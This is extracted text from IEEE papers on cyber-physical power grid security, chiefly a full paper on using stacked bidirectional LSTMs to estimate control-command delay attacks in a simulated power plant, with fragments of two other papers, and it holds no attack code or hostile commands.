2017. [21] Novelty and Outlier Detection (scikit- learn.org/stable/modules/outlier_detection.html#outlier-detection), 2017. [22] Godwin, J.L. and Matthews, P.C. and Watson, C., Classification and detection of electrical control system faults through SCADA data analysis, in Chemical engineering transactions. Volume 33. , pp. 985- 990, 2013. [23] scikit-learn Project, An Introduction to Machine Learning with scikit-l earn (scikit-learn.org/stable/tutorial/basic/tutorial.html), 2016. [24] sklearn.metrics: Metrics (scikit-learn.org/stable/modules/classes.html#sklearn-metrics-metrics), 2016. [25] Katherine Heller, Krysta Svore, Angelos D. Keromytis, Salvatore Stolfo, One Class Support Vector Machines for Detecting Anomalous Windows Registry Accesses, Columbia University Academic Commons, 2003. No. of Rec Accuracy Precision Recall F1 AUC Training Set 41580 0.96 1 0.96 0.98 n/a Test Set 1 5000 0.78 1 0.78 0.88 0.89 Test Set 2 7000 0.75 1 0.75 0.86 0.83 Test Set 3 13130 0.82 1 0.82 0.90 0.88 2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 585 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply.
Learning-Based_Time_Delay_Attack_Characterization_for_Cyber-Physical_Systems.pdf
The cyber-physical systems (CPSes) rely on com- puting and control techniques to achieve system safety and reliability. However, recent attacks show that these techniques are vulnerable once the cyber-attackers have bypassed air gaps. The attacks may cause service disruptions or even physical damages. This paper designs the built-in attack characterization scheme for one general type of cyber-attacks in CPS, which we call time delay attack , that delays the transmission of the system control commands. We use the recurrent neural networks in deep learning to estimate the delay values from the input trace. Speci cally, to deal with the long time-sequence data, we design the deep learning model using stacked bidirectional long short- term memory (LSTM) units. The proposed approach is tested by using the data generated from a power plant control system. The results show that the LSTM-based deep learning approach can work well based on data traces from three sensor measurements, i.e., temperature, pressure, and power generation, in the power plant control system. Moreover, we show that the proposed approach outperforms the base approach based on k-nearest neighbors. I. I NTRODUCTION The cyber-physical system (CPS) is a complex system com- posed of physical systems (e.g., power grids) and information and communication technologies (ICTs). The extensive use of ICTs can help improve system performance, but it can also be leveraged by the attackers to launch cyberattacks on the CPSes. So far, most cybersecurity solutions for CPSes have relied on air gaps or rewalls that can isolate the public network and the ICT components in CPSes. However, recently, due to the stepping stone attacks [1] and insiders attacks [2], this method is questionable. For example, the Dragon y attack [3] has breached the isolation of ICTs and the physical system in the power grids by compromising a third-party virtual private network software vendor. After the breaching, techniques like in Stuxnet [4] can be used to inject false control command to damage the system. Moreover, like the VPNFilter botnet created by infecting more than half a million routers using malware in 2018 [5], the attacker can also leverage the widespread IoT devices to build a botnet to launch distributed denial-of-service attacks or compromise devices in the network. The anomalies of CPSes, i.e., the unusual behaviors under normal operation, which includes the aforementioned possible security incidents as well as the system faults, operator errors and so on, can be harmful to the system. Thus, in this paper, we study the characterization of one general anomaly on the CPS with closed-loop control [6] [8], which we call time delayattack. It can be launched by the adversary that maliciously delays the transmissions of control command packets without altering the content. Different from conventional false data injection (FDI) attack, where the adversary needs to break the complicated cryptographic protection, the delay attack can be easily implemented by compromising routers or jamming the communication networks through the aforementioned malware infection. For many CPSes, the timely execution of the control command is essential. The delayed control command can degrade the system performance or even damage the system. If the attack characterization algorithm can estimate the length of delay ef ciently, the control center can assess the attack impact more accurately and apply proper mitigation strategies to avoid the harmfulness to the system [9]. In the common anomaly or time delay attack detec- tion/characterization, existing studies rst build the mathemat- ical model of the system and then verify the new data against the system model to detect or characterize the attack [10] [12]. However, for CPSes, constructing the accurate models are challenging due to the high complexity of physical processes. In this paper, we propose to use deep learning (DL) techniques to estimate the introduced time delay in CPSes. With DL, we do not need the full knowledge of the CPSes. Instead, we can build the DL model from the system historical data. Speci cally, in this paper, we use the recurrent neural network (RNN) consisting of long short-term memory (LSTM) units as the DL model for learning the length of delay in the attack. We evaluate our approaches in a power plant control system (PPCS), which is a typical CPS with the closed-loop control system. In the PPCS, the characterization algorithm has to keep tracking the long time-sequence sensor measurements, which is challenging for the DL technique. Although RNN is used for dealing with time sequence signals, it is challenging to work well in processing very long sequences if the DL algorithm is not properly designed. To address the above chal- lenge, we rst formulate the time delay attack characterization as a regression problem, i.e., estimating delay values, and then propose one novel LSTM-based DL approach. Speci cally, we use the bidirectional LSTM (BLSTM) units to construct the RNN network for long sequences. Moreover, we also design the format of the input data to improve the model performance in DL. The DL approach can ef ciently estimate the length of the delay. We also compare the performance with one benchmark approach, the k-nearest neighbors (kNN) approach in the PPCS. 12019 IEEE International Conference on Communications , Control, and Computing Technologies for Smart Grids (SmartGridComm) 978-1-5386-8099-5/19/$31.00 2019 IEEEAuthorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:28 UTC from IEEE Xplore. Restrictions apply. I I. R ELATED WORK Researchers have proposed various approaches to model- based anomaly detection for CPSes [10] [12], However, these approaches need to model the highly complicated physical process and also require the information of system setting and the operation data. In what follows, we review the learning- based approaches. In [13], deep neural network (DNN) and support vector machine (SVM) are constructed to detect the anomaly in a water treatment system testbed. In the DNN, one LSTM layer is connected to the feedforward layers to deal with the time series data. In addition, the widely used one-class SVM is applied for detection. The results show DNN works better in terms of precision. Moreover, for the same water testbed, the work [14] combines LSTM and cumulative sum to detect the deviations corresponding to anomalies in the rst subsystem of the testbed. However, none of them considers the signal delay in the anomaly scenarios. In [15], a two-level anomaly detection framework based on network packet signatures and DL techniques is proposed in industrial control systems (ICS). They rst construct a signature database for normal behaviors of network packets by observing the communications in the system. Then the signature database is included into a Bloom lter to nd anomalous network packets. Moreover, in the second level, to nd out the temporal dependencies between consecutive packets, LSTM is used to learn the most likely packet signatures from the previously seen network packets. However, in our problem, every packet is legal and with legit signatures, thus this approach cannot work. Researchers have also worked on the delay attack in the CPS and ICS systems [11], [12]. However, these approaches are based on the classic control theories that may not address the high complexities of CPSes [16]. In [12], a modi ed controller with a time-delay estimator is proposed to estimate the time delay on the feedback control system in load frequency control in the power system. However, the approach is only applicable to simpli ed linear time-invariant systems in state feedback control. In [16], they implement the delay attack in the ICS testbed on both the forward and feedback channels to see the effect. They also propose the recursive least squares method to detect the delay attack in the testbed. But this work considers the continuous process and the approach can only estimate speci c delay values, i.e., the one chosen in the model setting. III. B ACKGROUND OF BLSTM Different from the conventional neural networks that assume all the input and output are independent, RNN performs the tasks with the output being depended on the previous computations, which is illustrated in Fig. 1(a). LSTM network is a typical RNN composed of LSTM units [17]. It has been successfully applied to many sequence learning scenarios such as natural speech recognition [18] and machine transla- tion [19]. LSTM often outperforms the conventional RNN due to its capability to learn the long-term dependencies [20]. In LSTM network, each LSTM cell (i.e., each memory module A in Fig. 1(a)) has a complex structure so that it can remember A X1h1 A X2h2 A Xnhn ...... TanhTanh Xnhn hn-1Cn-1 fninC nonCn hnNeural network layerPointwise operation (a) (b) LSTM LSTM LSTM LSTM LSTM LSTM X1 Xn ... X2... ... ...y1 y2 yn... h1 h2 hnhn h2 Backward layer Forward layer (c) Fig. 1: Illustrations of RNN and LSTM. (a) An unrolled recurrent neural network. (b) A typical LSTM unit. (c) The unfolded architecture of bidirectional LSTM. values over arbitrary time intervals. Each cell includes the input gate, the output gate and the forget gate. These gates can be regarded as the conventional arti cial neurons in the neural network for computing the activation function of a weighted sum. They can decide how much old information to be remembered in the new state, what information to output and what information to pass to the next cell. Denote input vector to the LSTM as xn, the input vector to the hidden layer ashn 1and the output vector as hn. For a typical LSTM unit shown in Fig. 1(b), the implementation of the LSTM unit can be represented by following equations: fn=(Wfhn 1+ Ufxn+bf);in=(Wihn 1+Uixn+bi);C n= tanh(WChn 1+UCxn+bC);Cn=fn Cn 1+in C n on=(Wohn 1+Uoxn+bo);hn=on Tanh(Cn);where is the sigmoid function, T anh is the hyperbolic tangent function, fn;in;on;Cnare respectively the forget gate, input gate, output gate, and the cell state vector, Wz;Uz;bz, where z {f; i; o}, are the parameters to be learned, is the element-wise product. Due to the complex structure in LSTM network, it can memorize information over long time steps and then use these information for predicting the behavior in the next time step. Based on the basic LSTM model, there is a variant called bidirectional LSTM (BLSTM), which is motivated by the bidi- rectional RNN [21]. In BLSTM, the data sequence is processed in both forward and backward directions with two hidden lay- ers, where they are connected to the same output layer. It has been shown that the bidirectional network often outperforms the unidirectional one in many applications, for example, the speech recognition [18] and traf c prediction [22]. We illustrate an unfolded BLSTM network in Fig. 1(c). It contains one forward LSTM layer, one backward LSTM layer andfunctions. In the forward layer, it calculates the input data sequence consecutively from input sequence 1tonfor obtaining hi, where i= 1;2: : : ; n. The backward layer cal- culates the data sequence consecutively in the reverse manner 22019 IEEE International Conference on Communications , Control, and Computing Technologies for Smart Grids (SmartGridComm) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:28 UTC from IEEE Xplore. Restrictions apply. Power plantPIDNoise Delay PIDPower Controller Void fraction controllerPower setpoint (From AGC) Void fraction setpointGenerated power value measurement Evaporator void fraction measurementGas flow rateFig. 2: A power plant control system. from nto1for obtaining hi, where i=n; n 1; : : : ; 1. In both layers, the calculation is conducted by the standard LSTM cells as shown in Fig. 1(b). Different from unidirectional LSTM, the output is calculated as: yi=( hi; hi);where the function combines the two output sequences. It can be different types of functions depending on the system structure, e.g., summation, average or multiplication function. IV. T IME DELAY ATTACK IN PPCS This section de nes the system model and the adversary s threat model for the time delay attack in PPCS. A. System Model We consider the discrete-time CPS control system, which consists of sensors, actuators, and controllers (e.g., PLCs). Sensors convert the physical parameters into the sensor mea- surements, that are used as the input for the controllers to make control decisions. After that, the control commands from the controllers are transmitted to the actuators that will change the system state accordingly. The system is subjected to various disturbances, such as measurement noises, setpoint changes, etc. In this paper, we speci cally discuss one type of CPS control system, the power plant control system. The system structure is illustrated in Fig. 2, which is from ThermoPow- er [23], an open-source library based on Modelica. In this PPCS, it has three input signals: the power control signal, the gas ow rate signal and the void fraction control signal. The void fraction is also known as porosity, which is an important parameter characterizing two-phase uid ow, especially gas- liquid ow. Both the controllers for power control and the void fraction control adopt the proportional-integral-derivative (PID) control algorithm. Moreover, the disturbance in this PPCS comes from the additive random noise in the power generation measurements. In the PPCS, we can collect three types of sensor measure- ments, the temperature T P, the pressure Pand the generated electricity P E. Assume the trace length is T, by observing the measurements of T P,PandP E, we can have three traces zTP(t),zP(t)andzPE(t), where t= 1;2; : : : ; T . B. Threat Model Similar to the work in [9], the time delay attack is formally described as follows. The adversary aims to delay the controlcommand from the controller. For example, in Fig. 2, the control command from the power controller is delayed. Let x(t)denote control signal generated and transmitted by the controller in the tth time slot. During the transmission, packets are maliciously delayed by time slots. Thus, in the (t+ ) th time slot, the data x(t)arrives at the actuator. Since this is a discrete-time control system, the delay length is an integer. Moreover, in the time delay attack, the adversary does not modify the content of the transmitted data packet. The attack can be launched by jamming communication channels using an industrial IoT botnet or even through a compromised router. Note that the delay can also exist due to the natural communication latency even when there is no adversary. In this paper, we assume the clocks of the controller and the actuator are not synchronized. This is because otherwise the security of clock synchronization needs to be ensured, which, however, cannot be prevented by conventional security mea- sures including cryptographic authentication and encryption and thus requires sophisticated solutions as shown in [2]. In this paper, we propose an approach to estimate the delay in the absence of a secure clock synchronization mechanism. V. L EARNING -BASED TIMEDELAY ATTACK CHARACTERIZATION In this section, we rst formulate the time delay attack characterization problem and then propose the learning-based approach to solve this problem. A. Problem Formulation Due to the delayed control command, the actuator always executes the outdated operation, which may affect the system s normal running status and even cause damage to the system in the worst case. Therefore, the characterization scheme should keep monitoring the system status and once the attack happens, it should estimate the delay length as soon as possible, i.e., the delay length , so that the information can be used to assess and mitigate the impact of the attack before attack is eliminated. In this discrete-time PPCS system, the delay values are integers and can be any values. To predict the delay values using learning techniques, we formulate the characterization problem as the regression problem. The input to the regression algorithm is the long time-sequence data containing sensor measurements of T P; P andP Efrom PPCS as introduced in Section IV-A. The output is the delay value of the attack. We round the output of the regression to be an integer. According to the existing research work, the FDI attack launch time in the power system can be detected by analyzing the frequency changes [24]. In our paper, if we treat the time delay attack as the FDI attack, i.e., modify the data packet at (t+ )th time slot to be the one at time slot t, then the existing result can be applied to detect the attack launch time. Thus, in this paper, we only focus on the more advanced problem of characterizing the delay values and assume the attack launch time is obtained by using the technique in [24]. Since we can know the attack launch time, once it happens, we use the 32019 IEEE International Conference on Communications , Control, and Computing Technologies for Smart Grids (SmartGridComm) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:28 UTC from IEEE Xplore. Restrictions apply. trace containing the data before and after the attack launch time as the input to predict the delay value. In the following, we introduce the details of the learning-based approach. B. LSTM-based DL for Time Delay Characterization Recent work in [18], [22] have shown that the use of DNN can build up progressively higher-level representations of data. Motivated by the DNN structure, we stack the BLSTM hidden layers on top of each other, with the output data from one layer fed as the input for the next layer BLSTM to create a deep BLSTM structure. In this deep network, it contains three hidden layers composed of three stacked BLSTM layers to abstract the features from the time sequence data. They are followed by one multilayer perceptron (MLP) layer for regression. Note that, in the last BLSTM layer, to decrease the number of hidden nodes in the following MLP, we only return the last output in the output sequence, which is the concatenation of the results from the rst and last BLSTM units in this layer. Moreover, to mitigate over tting, we add dropout layer after each hidden layer. The deep LSTM network structure is shown in Fig. 3. BLSTM BLSTM BLSTMBLSTM BLSTM BLSTMBLSTM BLSTM BLSTM... ... ... X1 Xn ... X2MLPPredicted delay Fig. 3: The deep BLSTM network structure. It contains three stacked BLSTM layers and the MLP layer. 0 BBBB@zTP 0; zTP 1;   ; zTP q 1; zP 0; zP 1;   ; zP q 1; zPE 0; zPE 1;   ; zPE q 1 zTP q ; zTP q+1;   ; zTP 2q 1; zP q; zP q+1;   ; zP 2q 1; zPE q ; zPE q+1;   ; zPE 2q 1 ... zTP Q; zTP Q+1;   ; zTP p 1; zP Q; zP Q+1;   ; zP p 1; zPE Q; zPE Q+1;   ; zPE p 11 CCCCA; (1) In our problem, the input to the LSTM network is a very long time-sequence (up to 600 data points for each input trace), which is challenging for LSTM network. To better use the LSTM network, instead of naively using the raw long trace as the input to LSTM network, we pre-process the input data before feeding it to LSTM network. We construct an input matrix, where each row contains all three signals, i.e., zTP;zP;zPE. To capture the trend and the seasonality of the time series data, we truncate each trace of T P,PandP Einto ppieces and each with length q. After truncating the data, the input matrix can be expressed as in (1), where Q=p q. After obtaining this input p 3qmatrix (the length of each input trace is pq), each row of the input matrix is fed to one BLSTM cell. Then, the feature is abstracted from the stacked BLSTM layers before sending to the dense layer for regression.VI. E VALUATION A. Settings and Metrics We use OpenModelica [25], a Modelica-based simulator, to run the PPCS model in Fig. 2 to generate the dataset. In the PPCS model, the power controller s feedback command is corrupted by additive zero-mean Gaussian noises acting as disturbances to the system. The adversary delays the power controller s output signal. In the PPCS model, the power setpoint corresponds to the system load, which is set as the default value if not speci ed. The simulation starts from t= 0s and terminates at t= 1000 s. The attack is launched at t= 500s. The delay value is a randomly generated integer between 0s and 50s. We record the data of each simulation as our raw data. The system can be stopped before simulation ends due to the severe attack and it happens starting from t= 900 sin our dataset. Thus, we need to estimate the delay values before t= 900s. As introduced before, three measurements on T P,P, and P Eare used as the raw data for input. The default input trace range is between t= 200 sand t= 800s. The total number of data for xed power setpoint is 10,000. For each set of data, we use 70% for training and 30% for testing. Our LSTM networks are implemented using the Python DL library Keras [26], which is a high-level neural networks API running on top of TensorFlow, CNTK or Theano. To evaluate the performance of the delay attack characterization approaches, we use three metrics, root mean square error (RMSE), mean absolute errors (MAE) and mean absolute percentage errors (MAPE), as shown in following expressions: RMSE =vuut1 nn i=1( i^ i)2; MAE =1 nn i=1j i^ ij; M APE =100% nn i=1j i^ i ij; where iand^ iare the actual and estimated delay values of the ML approach at the ith test and nis the total number of test. Note that, in MAPE, we do not calculate the zero-delay case, i.e., no attack, as the denominator cannot be zero. B. The Benchmark Result We rst apply the simple but ef cient kNN approach as our benchmark for delay attack characterization in PPCS. kNN is a lazy learning approach, where no pre-computed training model is needed. In the kNN algorithm, give a labeled time series dataset, a chosen integer k, and the testing data, the kNN algorithm will output the knearest class labels from the training dataset and then return the dominate class label for the testing data. One critical part of kNN algorithm is to choose the distance metric. For the time series data, Euclidean distance is the simplest but ef cient choice. The distance metric between two time series data is formulated as: dist(d; d ) =vuutT t=1(d(t)d (t))2; (2) where dis the data for testing, d is one of the data from training dataset and Tis the input data length. kNN is a 42019 IEEE International Conference on Communications , Control, and Computing Technologies for Smart Grids (SmartGridComm) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:28 UTC from IEEE Xplore. Restrictions apply. searching-based technique, where a big data space is needed if we want to get the accurate result. In our problem, since we have three traces for three mea- surements, we concatenate them into one as the input to the kNN for calculating the Euclidean distance as in equation (2). (a) (b) Fig. 4: The performance of kNN approach. (a) Impact of different values of k. (b) The correlation between prediction and actual delay. We show the delay characterization performance by using kNN in Fig. 4. We increase the value of kto see the impact in Fig. 4(a). We can see from the metrics that kNN can work well when k= 1, i.e., nding only one nearest neighbor in the training data space, where RMSE is around 1.5s, MAE is 1s and MAPE is 14%. In Fig. 4(b), we show the correlation between actual delay values and the prediction results of kNN approach. We see that the error is biased when the delay is short, i.e., more prediction results are below the true values. This also explains the reason for bad performance in MAPE, where the heavier penalty is imposed on negative errors. In the kNN approach, our training data space is large enough that it is easy to nd out a close neighbor for the testing data. Thus, the error can be small in the kNN approach. C. Performance for LSTM Approach We now show the performance of the LSTM approach. We use the LSTM-based DL model as introduced in Section V for learning. The result is listed in Table I. We see that the LSTM can achieve very well prediction performance. The MAE is as small as 0.4s while the MAPE is only 5.5 %. Moreover, in Fig. 5(a), it shows the performance of different delay ranges in the LSTM approach. When the delay is short, the RMSE and MAE are very small, i.e., around 0.7s and 0.3s, respectively. While the delay becomes longer, the RMSE and MAE increase, but the largest MAE is just less than 1s, which is still relatively very small compared with the delay values 30-40s. When the delay range is small, MAPE is a bit high. The reason is that the prediction error is close to the true value, for example, the error may be 1s while the true delay value is 1s, thus the MAPE becomes high according to its de nition. But it is still much better than the kNN approach. Metrics RMSE (s) MAE (s) MAPE (%) Results 1.0 0.4 5.5 T ABLE I: Performance of LSTM approach. (a) (b) Fig. 6: The impact of input trace on different approaches. (a) Change trace starting points. (b) Change trace range. (a) (b) Fig. 5: The performance of LSTM approach. (a) The error under different delay ranges. (b) The correlation between prediction and actual delay. Fig. 5(b) shows the relationship between predicted delay values and the true delay values. We see that the predicted values lie much closer to the true delay values in general compared with Fig. 4(b). There can be cases the error is large when the delay is long. The reason is that the training data volume for this delay range is small. But the large error rarely happens. D. Comparison of Different Approaches We now compare the performance of these two approaches. For kNN, we choose k= 1. We show how the different settings of input traces affect the performance. We rst keep increasing the trace starting point from t0= 100s until t0= 250s in the raw data while xing the trace length as 600s and show the impact on different approaches in Fig. 6(a). Next, we make the trace range covering the same length before and after the attack but keeping increasing the input range length and show the impact to different approaches in Fig. 6(b). We see that, in general, if the input trace covers enough data after the attack, the LSTM-based DL can perform well. While for kNN, it is more robust to the input trace, as it only needs to nd its nearest neighbor. From the results in Fig. 6, we also see that there is a trade-off between the input trace range and the prediction performance. The longer range can bring better performance, but the estimated value will be obtained later. Thus, in this delay attack characterization problem, we should properly choose the input trace length and starting point for obtaining the better performance of the delay prediction result as soon as possible. Lastly, we use multiple power setpoints to mimic the different total loads in the power system. We add another 52019 IEEE International Conference on Communications , Control, and Computing Technologies for Smart Grids (SmartGridComm) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:28 UTC from IEEE Xplore. Restrictions apply. Fig. 7: The performance of different approaches using multiple power setpoints. 5 power setpoints and conduct the simulations under each of them as before to generate the data. We use 17000 data for training and 9000 data for testing, in which 1500 data corresponds to the data generated from randomly chosen but reasonable power setpoint to test the model s robustness to the load changes, i.e., the power setpoints not shown in the training data. To train the model for multiple power setpoints, we modify the previous learning models. For LSTM approach, we change the model in Fig. 3 by adding the power setpoint as the input to MLP layer except for the features obtained from the BLSTM layers. The performance of using different approaches under mul- tiple power setpoints is shown in Fig. 7. We see that, the kNN approach cannot work well due to limited searching space for each power setpoint. Moreover, because of the random power setpoint in the test set, the kNN cannot nd the corresponding searching space as the data is not in the training set. This is also the disadvantage of the kNN approach. While for the DL approach, as it has the capability to construct the correlations that are not shown in the training data, i.e., for the power setpoint not shown in the training data, it performs well. VII. C ONCLUSION This paper studied the time delay attack characterization in CPSes with the DL techniques. We proposed LSTM-based DL to estimate the command delay in the feedback control of CPSes. The proposed approach was evaluated by generating the data from a PPCS. By comparing the performance with the benchmark approach, the kNN, under different settings, we see that the LSTM-based DL can work well as long as we have enough data for constructing the training model. kNN can work well only when we have big data space for searching the closest neighbor for the input data. ACKNOWLEDGEMENT This research was supported in part by the National Re- search Foundation, Prime Minister s Of ce, Singapore under its Campus for Research Excellence and Technological Enter- prise (CREATE) programme, in part by Energy Programme administered by the Energy Market Authority (EP award no. NRF2017EWT-EP003-061), and in part by SUTD-ZJU IDEA programme under grant no. 201805.REFERENCES [1] Y. Zhang and V. Paxson, Detecting stepping stones, in USENIX Security Symposium , 2000. [2] S. Viswanathan, R. Tan, and D. Yau, Exploiting power grid for accurate and secure clock synchronization, in ACM Transactions on Sensor Networks (TOSN), vol. 4, no. 2, 2018. [3] Hackers in ltrated power grids in U.S., Spain, https://goo.gl/ DUWT1o. [4] Y. Zhang and V. Paxson, Stuxnet worm impact on industrial cyberphys- ical system security, in IECON, 2011. [5]The VPNFilter Botnet Is Attempting a Comeback , https://bit.ly/ 2xH5UQI. [6] B. Chen, S. Mashayekh, K. Butler-Purry, and D. Kundur, Impact of cyber attacks on transient stability of smart grids with voltage support devices, in IEEE PES General Meeting , 2013. [7] X. Cao, P. Cheng, J. Chen, S. Ge, Y. Cheng, and Y. Sun, Cognitive radio based state estimation in cyber-physical systems, IEEE Journal on Selected Areas in Communications, vol. 32, no. 3, pp. 489 502, 2014. [8] A. Farraj, E. Hammad, and D. Kundur, A cyber-physical control framework for transient stability in smart grids, IEEE Trans. Smart Grid, vol. 4, no. 2, pp. 847 855, 2013. [9] X. Lou, C. Tran, R. Tan, D. Yau, and Z. Kalbarczyk, Assessing and mitigating impact of time delay attack: A case study for power grid frequency control, in ACM/IEEE International Conference on Cyber- Physical Systems (ICCPS) , 2019. [10] F. Pasqualetti, F. Dor er, and F. Bullo, Cyber-physical attacks in power networks: models, fundamental limitations and monitor design, in IEEE Conference on Decision and Control (CDC) , 2011. [11] W. Michiels and S. Niculescu, Stability, control, and computation for time-delay systems: an eigenvalue-based approach, in SIAM , 2014. [12] A. Sargolzaei, K. Yen, and M. Abdelghani, Preventing time-delay switch attack on load frequency control in distributed power systems, IEEE Trans. on Smart Grid , vol. 7, no. 2, pp. 1176 1185, 2016. [13] J. Inoue, Y. Yamagata, Y. Chen, C.Poskitt, and J. Sun, Anomaly detection for a water treatment system using unsupervised machine learning, in IEEE International Conference on Data Mining Workshops (ICDMW), 2017. [14] J. Goh, S. Adepu, M. Tan, and Z. Lee, Anomaly detection in cyber physical systems using recurrent neural networks, in IEEE International Symposium on High Assurance Systems Engineering (HASE) , 2017. [15] C. Feng, T. Li, and D. Chana, Multi-level anomaly detection in industrial control systems via package signatures and LSTM networks, inIEEE/IFIP International Conference on Dependable Systems and Networks (DSN) , 2017. [16] E. Korkmaz, M. Davis, A. Dolgikh, and V. Skormin, Detection and mitigation of time delay injection attacks on industrial control systems with PLCs, in International Conference on Applied Cryptography and Network Security (ACNS), 2017. [17] S. Hochreiter and J. Schmidhuber, Long short-term memory, Neural computation, vol. 9, no. 8, pp. 1735 1780, 1997. [18] A. Graves, A. Mohamed, and G. Hinton, Speech recognition with deep recurrent neural networks, in IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), 2013. [19] I. Sutskever, O. Vinyals, and Q. V. Le, Sequence to sequence learning with neural networks, in International Conference on Neural Informa- tion Processing Systems (NIPS), 2014. [20] Y. Bengio, P. Frasconi, and P. Simard, The problem of learning long-term dependencies in recurrent networks, in IEEE International Conference on Neural Networks (ICNN), 1993. [21] M. Schuster and K. Paliwal, Bidirectional recurrent neural networks, IEEE Transactions on Signal Processing, vol. 45, no. 11, pp. 2673 2681, 1997. [22] Z. Cui, R. Ke, and Y. Wang, Deep bidirectional and unidirectional LSTM recurrent neural network for network-wide traf c speed predic- tion, arXiv preprint arXiv:1801.02143, 2018. [23] ThermoPower , https://casella.github.io/ThermoPower/. [24] R. Tan, H. Nguyen, E. Foo, X. Dong, D. Yau, Z. Kalbarczyk, R. Iyer, and H. Gooi, Optimal false data injection attack against automatic gen- eration control in power grids, in ACM/IEEE International Conference on Cyber-Physical Systems (ICCPS) , 2016. [25] OpenModelica , https://www.openmodelica.org/. [26] F. Chollet et al., Keras, 2015, https://keras.io. 62019 IEEE International Conference on Communications , Control, and Computing Technologies for Smart Grids (SmartGridComm) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:28 UTC from IEEE Xplore. Restrictions apply.
Learning-Based Time Delay Attack Characterization for Cyber-Physical Systems Xin Lou, Cuong Tranz, David K.Y. Yauz, Rui Tany, Hongwei Ngx, Tom Zhengjia Fu, Marianne Winslettx Advanced Digital Sciences Center, Illinois at SingaporeyNanyang Technological University, Singapore zSingapore University of Technology and DesignxUniversity of Illinois at Urbana-Champaign, USA
CyberPhysical_System_Security_for_the_Electric_Power_Grid.pdf
|The development of a trustworthy smart grid requires a deeper understanding of potential impacts resulting from successful cyber attacks. Estimating feasible attack impact requires an evaluation of the grid s dependency on itscyber infrastructure and its ability to tolerate potential failures.A further exploration of the cyber physical relationships withinthe smart grid and a specific review of possible attack vectors isnecessary to determine the adequacy of cybersecurity efforts.This paper highlights the significance of cyber infrastructure security in conjunction with power application security to pre- vent, mitigate, and tolerate cyber attacks. A layered approach isintroduced to evaluating risk based on the security of both thephysical power applications and the supporting cyber infra-structure. A classification is presented to highlight dependen-cies between the cyber physical controls required to supportthe smart grid and the communication and computations thatmust be protected from cyber attack. The paper then presents current research efforts aimed at enhancing the smart grid s application and infrastructure security. Finally, current chal-lenges are identified to facilitate future research efforts.
INVITED PAPER Cyber Physical System Security for the Electric Power Grid Control in power systems that may be vulnerable to security attacks is discussed in this paper as are control loop vulnerabiliti es, potential impact of disturbances, and several mitigations. BySiddharth Sridhar, Student Member IEEE ,Adam Hahn, Student Member IEEE ,a n d Manimaran Govindarasu, Senior Member IEEE KEYWORDS |Cyber physical systems (CPS); cyber security; electric grid; smart grid; supervisory control and data acquisi-tion (SCADA) I.INTRODUCTION An increasing demand for rel iable energy and numerous technological advancements have motivated the develop-ment of a smart electric grid. The smart grid will expand the current capabilities of the grid s generation, transmis- sion, and distribution systems to provide an infrastructurecapable of handling future requirements for distributedgeneration, renewable energy sources, electric vehicles,and the demand-side management of electricity. The U.S.Department of Energy (DOE) has identified seven pro-perties required for the smart grid to meet future demands[1]. These requirements include attack resistance, self- healing, consumer motivation, power quality, generation and storage accommodation, enabling markets, and assetoptimization. While technologies such as phasor measurement units (PMU), wide area measurement systems, substationautomation, and advanced metering infrastructures(AMI) will be deployed to help achieve these objectives,they also present an increased dependency on cyber resources which may be vulnerable to attack [2]. Recent U.S. Government Accountabili ty Office (GAO) investiga- tions into the grid s cyber infrastructure have questionedthe adequacy of the current security posture [3]. TheNorth American Electric Reliability Corporation (NERC)has recognized these concerns and introduced compli-ance requirements to enforc eb a s e l i n ec y b e r s e c u r i t y efforts throughout the bulk power system [4]. Addition- ally, current events have shown attackers using increas- ing sophisticated attacks a gainst industrial control systems while numerous countries have acknowledgedthat cyber attacks have targeted their critical infrastruc-tures [5], [6]. A comprehensive approach to understanding security concerns within the grid must utilize cyber physical sys-tem (CPS) interactions to appropriately quantify attack impacts [7] and evaluate effectiveness of countermeasures. This paper highlights CPS security for the power grid asthe functional composition of the following: 1) the physical Manuscript received June 29, 2011; revised August 11, 2011; accepted August 12, 2011. Date of publication October 3, 2011; date of current version December 21, 2011. This work was supported by the National Science Foundation under Grant CNS 0915945. The authors are with the Department of Electrical and Computer Engineering, Iowa State University, Ames, IA 50011 USA (e-mail: [email protected]). Digital Object Identifier: 10.1109/JPROC.2011.2165269 210 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 0018-9219/$26.00 /C2112011 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. components and control applications; 2) the cyber infra- structures required to support necessary planning, oper- ational, and market functions; 3) the correlation between cyber attacks and the resulting physical system impacts;and 4) the countermeasures to mitigate risks from cyberthreats. Fig. 1 shows a CPS view of the power grid. Thecyber systems, consisting of electronic field devices, com-munication networks, substation automation systems, andcontrol centers, are embedded throughout the physicalgrid for efficient and reliable generation, transmission, and distribution of power. The control center is responsible for real-time monitoring, control, and operational decisionmaking. Independent system operators (ISOs) performcoordination between power utilities, and dispatch com-mands to their control centers. Utilities that participate inpower markets also interact with the ISOs to support mar-ket functions based on real-time power generation, trans-mission, and demand. This paper addresses smart grid cybersecurity concerns by analyzing the coupling between the power controlapplications and cyber systems. The following terms areintroduced to provide a common language to address theseconcepts throughout the paper: power application : the collection of operational control functions necessary to maintain stabilitywithin the physical power system; supporting infrastructure : the cyber infrastructure including software, hardware, and communicationnetworks. This division of the grid s command and control functionswill be utilized to show how cybersecurity concerns can beevaluated and mitigated throu gh future research. Attempts to enhance the current cybersecurity posture should ex-plore the development of secure power applications with more robust control algorithms that can operate reliably in the presence of malicious inputs while deploying a secure supporting infrastructure that limits an adversary s ability to manipulate critical cyber resources.The paper is organized as follows. Section II introduces a risk assessment methodology which incorporates both cyber and physical characteristics to identify physical im- pacts from cyber attacks. Section III presents a classifica-tion detailing the power applications necessary to facilitate grid control. Each power application contains a review ofthe information, communication, and algorithms requiredto support its operation. Additionally, specific cybersecur-ity concerns are addressed for each application and poten-tial physical impacts 